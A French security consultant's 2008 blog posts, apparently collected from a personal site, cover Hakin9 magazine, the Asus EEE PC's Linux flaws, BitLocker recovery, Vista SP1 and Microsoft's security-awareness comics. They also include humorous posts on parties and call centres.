Les fautes de style, d'orthographe et de grammaire sont beaucoup moins nombreuses. Ca n'est probablement pas le fait du comité de relecture (en tout cas il ne semblait pas y en avoir dans les précédents numéros), mais plutôt de la qualité intrinsèque des auteurs.

La seule chose qui subsiste, ce sont les publicités kitsch :)

Sur le fond, voici une revue de quelques articles phares :

Sécurité Oracle, par un formateur Oracle ayant travaillé plusieurs années dans cette même société. Avec des techniques (telles que l'exploration des tables v$*) qui donnent envie de lire un dossier sur la sécurité des bases de données dans MISC (le serpent de mer ...).
Sécurité MySQL, par un hébergeur. Plutôt orienté configuration donc, mais techniquement valable.
Fuite d'information via un ordinateur portable volé, un sujet à la mode qui fera plaisir à l'inventeur de l'offensics. Note : l'article est disponible en ligne sur le site de Hakin9 sous forme PDF.
Sécurité BlueTooth, avec des vraies captures d'écran du "fameux" logiciel FTS4BT. Ca prouve que l'auteur est au fait des dernières attaques, mais à $10,000 la licence on peut quand même se poser des questions sur la provenance de ces screenshots ;)

PS. Bon anniversaire à mon droïde préféré, à savoir :

[*] Ou la présentation de SandMan à BlackHat US 2008. Il n'y a qu'en Europe où vous n'aurez pas le droit à cette conférence, pour une raison indépendante de ma volonté ;)

Comment passer une soirée réussie ?

2008-05-18T21:34:00.002+02:00

L'expérience de ce week-end prouve qu'il faut respecter plusieurs critères simples, mais complètement contre-intuitifs. En voici donc la primeur :

Ne rien tenter d'organiser. Celui qui organise essaie de trouver une date qui plaise à tout le monde, en général la seule où il n'est pas dispo.
Prévenir les gens 2h avant la soirée, afin qu'ils ne puissent pas invoquer des prétextes fallacieux tels que "j'ai peut-être escalade".
Ne pas tenter s'alimenter, sinon l'épineux problème du choix va se poser. De toute façon, dans la bière, il y a à boire et à manger.
Ne donner aucune consigne stressante pour les invités, du type "apportez à manger pour un nombre de personnes compris entre 3 et 20". Statistiquement, il y aura alors 50% bière et 50% vodka, ce qui est parfait (la nature est bien faite).
Ne pas inviter de jeunes. Ils boivent du Coca avec sucre.
Ne pas inviter l'underground. Comme ils n'ont pas de sous, ils font leurs courses chez Leader Price.
Ne pas épuiser les sujets Debian et LatexBeamer avant la fin de la première bouteille de vodka.

Attention ces critères n'ont été testés que sur des individus reconnus geeks incurables. Je décline toute responsabilité en cas d'utilisation sur un public moins averti.

Special K.

2008-04-20T20:07:00.003+02:00

Je dédie ce papier à un franco-américain bien connu dans le monde de la sécurité.

Pour faire court, il a été résumé ici par le SANS.

Pour faire encore plus court (et en français), les auteurs prétendent avoir créé un outil qui fabrique automatiquement, à partir des patches Microsoft, un exploit (quasiment) fonctionnel, le tout en 3 minutes.

Alors, FUD ou réalité d'après vous ? ;)

PS. J'ai quand même l'impression qu'on croûle sous les "papiers" ces derniers temps ... Un effet de bord du regain d'intérêt des universitaires pour la sécurité ?

Toujours aussi illimité ...

2008-04-19T10:00:00.000+02:00

Il faut vraiment faire attention aux conditions d'utilisation de la fameuse "3G" dont on nous rebat les oreilles, car elles changent souvent :

Pour ceux qui n'ont pas le courage de lire :

(5) [...] Afin de permettre à tous les abonnés d'accéder à Internet dans des conditions optimales, le réseau 3G/3G+ étant mutualisé, le débit maximum de connexion sera ajusté à 128Kb/s au-delà de 1Go d'échange de données par mois, jusqu'à la prochaine date de facturation.

Ah oui j'oubliais :
100% compatible ? Je ne vais pas faire le malin avec OpenBSD ... il suffit de savoir que les clés écoulées jusqu'au début de cette année n'étaient pas compatibles Vista.

Tout cela vous semble moisi ? Et bien ils ne s'en cachent même plus maintenant :)

PS. Juste pour le troll, le prochain Asus EEE sera proposé sous Windows XP :)

De l'utilisation intelligente du "grey listing"

2008-04-04T21:47:00.001+02:00

C'est probablement la saison qui veut ça (avec l'approche des impôts), mais les call centers se déchainent en ce moment.

Inspiré par l'efficacité du greylisting pour lutter contre le spam courriel, j'ai décidé de le mettre en place dans ma vie de tous les jours également (même si cela risque de me rapporter moult points au geek test).

Donc je ne réponds plus au téléphone dès le premier appel : si c'est vraiment important, les correspondants rappellent immédiatement ou laissent un message.

Je n'ouvre plus ma porte non plus. Si quelqu'un sait que je suis là (par exemple parce que je lui ai donné rendez-vous), il appelle sur le portable ou sonne une deuxième fois.

Le seul problème : certains call centers appellent même au bureau désormais ! Parfois l'interlocuteur dispose d'informations qui laissent vaguement supposer d'où il tire son listing de contacts, mais j'en suis resté là pour le moment.

Il ne me reste plus qu'à militer pour faire ajouter à la charte sécurité de l'entreprise l'interdiction de décrocher son téléphone s'il n'a pas déjà sonné dans les 2 minutes précédentes - ce qui finalement est largement aussi justifiable que l'interdiction d'introduire des appareils photos encore affichée à l'entrée de nombreux sites industriels ...

Mais tout n'est pas si noir : le spam (courriel ou téléphonique) permet de s'assurer périodiquement que l'infrastructure de communication continue à fonctionner. C'est le Nagios^H^H^HMicrosoft System Center du pauvre en quelque sorte !

Cherchez l'erreur

2008-03-28T19:20:00.003+01:00

Pour se détendre avant le week-end :)

Rendez moi mon écran bleu

2008-03-20T20:52:00.002+01:00

(Suite du précédent message, toujours à propos de l'Asus EEE).

Voici une aventure à double sens.

J'essaie de me connecter à mon réseau WiFi en WPA-PSK via l'utilitaire de configuration graphique. Mon réseau est protégé par une passphrase suffisament longue, comme il se doit. Et là, c'est le drame.

Non seulement ça ne marche pas, mais le message d'erreur présente tous les symptômes d'une injection de commandes shell, bien connue dans le milieu du modem adéhaisselle[*].

Après une bonne heure de débogage, le problème est identifié. Le script /etc/network/if-pre-up.d/0001xandros-wireless-tools fait appel au script /usr/sbin/xandros-wpa-config pour générer dynamiquement la configuration wpa_supplicant.

Ces deux scripts ne protègent pas correctement la passphrase par des guillemets, ce qui provoque des erreurs inattendues lorsque la passphrase contient des espaces ... (comme toute phrase normalement constituée).

On peut tirer deux conclusions relativement différentes de cette histoire :

C'est beau l'Open Source, je vais avoir mon nom dans un CHANGELOG. Ah non en fait je ne sais pas comment remonter le bogue à Asus, Taiwan.
J'ai perdu une heure de ma vie à fixer un problème trivial. Et personne n'utilise de passphrase correcte.

Quel est le lien avec le titre de ce billet ? C'est qu'il ne faut pas changer de résolution trop souvent sur cette même machine :)

La bonne nouvelle, c'est que la version de CUPS installée n'écoute que sur l'interface de boucle locale. Cette fois-ci, ça n'est pas Sun/Solaris qui prend mais Apple /MacOS :)

[*] On dit bien cédérom, non ?

Ceci n'est pas une bâche gratuite

2008-03-18T11:18:00.002+01:00

Pour mon anniversaire, je me suis offert le pur jouet geek : l'Asus EEE PC.

En France, il semble qu'un opérateur de téléphonie mobile ait obtenu l'exclusivité de sa distribution. Il reste toutefois possible de l'acheter sans abonnement 3G pour la modique somme de 299 euros. Avec 500,000 exemplaires vendus en France (source orale), l'objet est en rupture de stock chez pratiquement toutes les grosses enseignes.

L'objet est graphiquement séduisant, même si les marges d'écran (et son format tout en longueur) sont assez décevants. La connectique est bonne : plusieurs ports USB, port Ethernet, sortie VGA (indispensable pour les professionnels de la présentation), chipset WiFi Atheros, lecteur SD/MMC. Pas de port PCCard/PCMCIA toutefois.

Sous le capot on trouve une distribution Linux basée sur Debian : Xandros. Attention, le support est entièrement assuré par Asus. Et là, c'est le drame.

Tout le monde a lu que la version de Samba livrée et démarrée par défaut sur ce système est vulnérable à une faille exploitable à distance.

Mais ce qui est beaucoup plus intéressant, c'est que la personnalisation opérée pour le support de la clé USB 3G+ de Huawei (revendue par l'opérateur sus-mentionné) "casse" le système de packages. Aucune mise à jour n'est possible via l'interface graphique, un message d'erreur cryptique de type "try apt-get -f install" étant affiché.

Hmm, 500,000 systèmes non patchables dans la nature, ça fait réfléchir :)

Accessoirement, je n'ai jamais réussi à configurer mon accès WPA-PSK via l'interface graphique. "wpa_supplicant.conf" est ton ami.

En conclusion voici la bâche : Linux pour tous, ça n'est toujours pas pour demain, même avec des grosses icônes :)

Quelques infos pour les purs geeks : le système est livré avec Python et Ruby en standard, mais pas GCC. Le processeur est un Intel Centrino classique. L'utilisateur de base (compte "user") est également sudoer sans mot de passe. Et le support IPv6 n'est pas compilé dans le noyau :)

6 choses sur moi

2008-03-13T16:11:00.002+01:00

Nonop, dans son blog consacré à la sécurité, tente une action de Lutte Informatique Offensive grossière afin de me profiler plus finement.

On notera que son blog est hébergé chez Wordpress, mais cet homme n'est pas à une contradiction près, puisqu'il est à la fois consultant et expert \LaTex :)

Voici donc 6 éléments aléatoires sur moi :

Comme la plupart des consultants en sécurité, j'ai (eu) pour loisirs différentes activités telles que le jeu de rôle, le paintball et les concerts de hard rock.
A contrario, je considère la majorité des productions "rap" comme une musique complètement immature et infatuitée - malgré un avis contraire de tous mes collègues directs. J'ai presque plus de sympathie pour la Tectonik (bien que je ne sache toujours pas épeler ce mot correctement).
Je suis au régime. Et c'est mon anniversaire bientôt (corollaire de la remarque précédente), mais je ne peux pas vous dire quand car c'est une question secrète sur de nombreux sites.
J'ai déjà fait une estive dans le Vercors avec un troupeau de 3000 têtes et 13 chiens de protection, dans une zone à loups.
J'ai habité 2 ans en Martinique - j'ai donc un degré de plongée sous-marine, le permis bateau hauturier (je peux conduire un super-tanker pour des trajets non-commerciaux :) et un degré en parapente.
Et surtout, je déteste les chaines et les hoaxes en tout genre, qui contribuent à niveler Internet par le bas (comment faire de la sensibilisation sérieuse après ça ?). Je ne ferai donc pas suivre l'invitation à 6 malheureuses victimes :)

Echantillon gratuit

2008-03-03T10:48:00.001+01:00

Pour ceux qui n'ont pas la chance d'être abonnés, voici un échantillon du dernier numéro de Hakin9. Enjoy!

C'est bientôt le printemps !

2008-02-27T21:18:00.003+01:00

Tout fleurit à nouveau, et tout se renouvelle.

Par exemple la nouvelle version de ImpRec, compatible Vista 64 bits (WoW).

Ou le SP1 pour Vista, que j'ai installé sans trop de problèmes (juste un BSoD :) sur plusieurs machines, et qui a effectivement diminué la consommation mémoire de 10% et augmenté de manière sensible les performances du système de fichiers.

Ou la nouvelle maquette du Hakin9 de février, qui est arrivé ce jour dans ma boite aux lettres avec comme gros titre "failles critiques sur le protocole SSH" (rien que ça).

Ou la nouvelle maquette du prochain MISC, mais chut !

Non, ce dont je veux surtout vous parler c'est la sortie publique du projet SandMan (version 32 bits uniquement) - avec support Python pour les amateurs :) Et oui, comme nous ne sommes pas retenus au SSTIC cette année, vous n'aurez pas à attendre le mois de juin !

Microsoft x3

2008-02-22T21:40:00.002+01:00

#1 BitLocker

Mon portable sous Vista Ultimate est chiffré avec BitLocker + TPM 1.2. Et là, c'est le drame : je dois rendre la machine d'urgence. Comment récupérer les données alors que je n'ai pas eu le temps de les déchiffrer ? Il ne me reste que le disque dur entre les mains.

A tout hasard, je branche le disque dans une machine identique. Il me demande mon mot de passe de recouvrement (que j'ai soigneusement noté à l'installation, bien m'en a pris).

Le système démarre. Je désactive BitLocker, le temps d'initialiser le nouveau TPM et de rebooter. Je réactive BitLocker et tout fonctionne parfaitement ! Avouez que vous n'y croyez pas :)

#2 Vista SP1

Le SP1 pour Vista est disponible depuis quelques jours en version finale auprès des abonnées Technet+. Bilan des courses : 1,13 Go à télécharger (pour la versions 4 langues 32 et 64 bits). Au passage le téléchargement s'effectue avec un joli ActiveX de chez Akamai. I love the smell of homemade software in the morning :)

#3 Microsoft et l'Open Source

C'est inattendu, c'est incroyable et pourtant ... tous les formats de fichiers et tous les protocoles Microsoft sont désormais disponibles publiquement et libres de droits en format PDF et XPS !

Ici les formats Office.

Ici les formats Windows.

#4 (Bonus)

Et pendant ce temps là dans l'Open Source historique.

"Selon l’organisme secunia, les problèmes sont liés aux fonctions présentes dans l’appel système fs/splice.c. Les experts divergent sur la nature plus ou moins critique du bug mais, toutefois, tous s’accordent sur la nécessité d’appliquer le patch en installant la version la plus récente du noyau."

Allez, voilà de quoi mettre les experts d'accord :)

Hello Secure World ?

2008-02-18T15:58:00.002+01:00

Hello Secure World, c'est le titre de cette nouvelle opération de communication Microsoft autour de la sécurité. Avec installation du plugin SilverLight obligatoire ...

Parmi les ressources proposées, on y trouve un ensemble de strips destinés à la sensibilisation des non-inités (à mon avis, c'est pas gagné quand même). Puisque le serveur est en HTTP, ne vérifie pas le Referer ni le Cookie, voici les liens directs sniffés sur le cable :)

L'écriture de code sécurisé :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_001_web.jpg
L'analyse statique :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_002_web.jpg
L'écriture de code sécurisé, bis :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_003_web.jpg
Le filtrage des entrées utilisateur :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_004_web.jpg
L'explication du buffer overflow (wow!) :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_005_web.jpg
L'explication du cross-site scripting :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_006_web.jpg
La cryptographie :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_008_web.jpg
La défense en profondeur :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_009_web.jpg
Le Man-in-the-Middle :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_011_web.jpg
L'usurpation d'identité :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_012_web.jpg

Pour finir, en voici 2 qui me semblent assez polémiques.

Google Hacking :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_010_web.jpg
Google en train d'embrocher des sites Web ? Pourquoi ne pas parler de Windows Live Search hacking plutôt ? Peut-être que le nom est trop long pour tenir dans une bulle :)

La faille PDF :
http://www.microsoft.com/click/hellosecureworld/xaml/C2/hsw_007_web.jpg
Sans aller jusqu'à dire qu'Acrobat Reader et le format PDF sont sûrs, il me semble quand même que ça s'est terminé en patch Microsoft pour l'API ShellExecute(), cette affaire ...

Est-ce bien légal ?

2008-02-16T22:08:00.002+01:00

Voilà une annonce Google AdSense, vue sur Clubic.com, qui ne manque pas de piquant :

Dans le cas où cette offre ne serait pas légale, je me demande qui est responsable de quoi devant la loi, entre Clubic, Google, les régies publicitaires et le site final.

Le programme du SSTIC 2008 est en ligne

2008-02-13T21:41:00.004+01:00

Bon d'accord, c'est un programme prévisionnel, mais ça veut dire qu'il va falloir bientôt surveiller les inscriptions (le point critique chaque année, tout est vendu en 3 jours !).

On remarquera que cette année, il n'y a qu'une seule équipe de recherche qui est sur-représentée, contrairement aux années précédentes. Bravo au comité de programme d'avoir su rétablir la balance, en injectant du sang neuf.

Il faut avouer que le site de cette équipe est en symbiose avec celui du SSTIC :

Gageons que leurs interventions seront également à la hauteur des prestations habituelles du SSTIC !

On est vendredi soir et je suis oisif ...

2008-02-08T22:24:00.000+01:00

Alors en vrac :

Il n'y a jamais eu autant de failles "client" dans la nature : FireFox (pre-2.0.0.12), QuickTime (pre-7.4.1), Acrobat Reader (pre-8.1.2), ... Ca devient difficile de surfer tranquillement sur le Web 2.0 (sauf avec Vista 64 et DEP AlwaysOn bien sûr :)
D'ailleurs le Patch Tuesday de février va être une sorte de Super Tuesday : 12 patches dont 7 critiques, avec une exploitation de code à distance sur toutes les versions de IIS ... Et le parc des 200 machines de démo des TechDays qui va rester non patché ... C'est mâââl ...
Non je n'étais pas à la soirée VIB (Very Important Bloggers) des TechDays ... Trop de goodies peut-être ...
Vu sur le site des TechDays d'ailleurs : le responsable des licences logicielles chez Microsoft France s'appelle Monsieur Bourreau. Ca donne envie.
De toute façon, après avoir vu ça, je ne suis pas sûr que bosser chez Microsoft soit un bon plan ... (prêtez attention au témoignage de l'insider).